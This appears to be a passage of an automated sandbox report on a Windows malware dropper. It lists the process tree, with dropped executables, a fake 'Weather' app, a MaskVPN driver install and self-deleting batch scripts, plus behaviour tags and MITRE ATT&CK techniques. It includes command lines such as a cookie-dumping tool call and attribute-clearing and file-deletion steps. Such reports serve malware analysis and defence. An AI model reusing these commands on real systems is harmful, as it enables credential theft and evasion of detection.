C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:6072
-
C:\ProgramData\2248650.exe"C:\ProgramData\2248650.exe"5⤵PID:4124
-
-
C:\ProgramData\2719437.exe"C:\ProgramData\2719437.exe"5⤵PID:5668
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:6820
-
-
-
C:\ProgramData\6387974.exe"C:\ProgramData\6387974.exe"5⤵
- Checks computer location settings
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
PID:2620 -
C:\ProgramData\6387974.exe"{path}"6⤵PID:2832
-
-
C:\ProgramData\6387974.exe"{path}"6⤵PID:4004
-
-
-
C:\ProgramData\6074351.exe"C:\ProgramData\6074351.exe"5⤵PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7072
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6200
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4792
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2164
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4920
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2620
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3b81⤵PID:3344
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6340
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6652 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1E97EF91832962D7C7C2B0DDDFCCBDA8 C2⤵
- Loads dropped DLL
PID:6804
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 26D58F3B23C0443AF0B8016E3EA7FA332⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:7212
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵PID:5208
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Executes dropped EXE
PID:6860 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵PID:6716
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1b0,0x1ec,0x7ffc55969ec0,0x7ffc55969ed0,0x7ffc55969ee05⤵PID:5536
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff754b44e60,0x7ff754b44e70,0x7ff754b44e806⤵PID:3980
-
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=1708 /prefetch:85⤵PID:8068
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2440 /prefetch:15⤵PID:4332
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=2152 /prefetch:85⤵PID:8188
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:25⤵PID:6948
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=3116 /prefetch:85⤵PID:7400
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1648 /prefetch:25⤵PID:5856
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=2672 /prefetch:85⤵PID:6948
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=3140 /prefetch:85⤵PID:7524
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=1936 /prefetch:85⤵PID:7300
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1636,9468554582045304148,17266291162905479854,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6716_349906419" --mojo-platform-channel-handle=2600 /prefetch:85⤵PID:4820
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXECF6D.bat" "3⤵PID:1376
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"4⤵
- Views/modifies file attributes
PID:6208
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:6528
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXECF6D.bat"4⤵
- Views/modifies file attributes
PID:6788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXECF6D.bat" "4⤵PID:8116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:5260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXECF7D.bat" "3⤵PID:5368
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
PID:5916
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:6468
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:5056
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXECF7D.bat"4⤵
- Views/modifies file attributes
PID:7020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXECF7D.bat" "4⤵PID:6320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:6844
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6104
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8016
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7176
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7880
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6996
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:4608
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0dab60a5-fbaf-154e-96f1-f57c759a9f10}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3892
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"2⤵PID:7172
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:6888
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7256
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6380
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Enumerates system info in registry
PID:4640
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:5372
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:5812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4784
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Hidden Files and Directories
1Install Root Certificate
1Modify Registry
3Web Service
1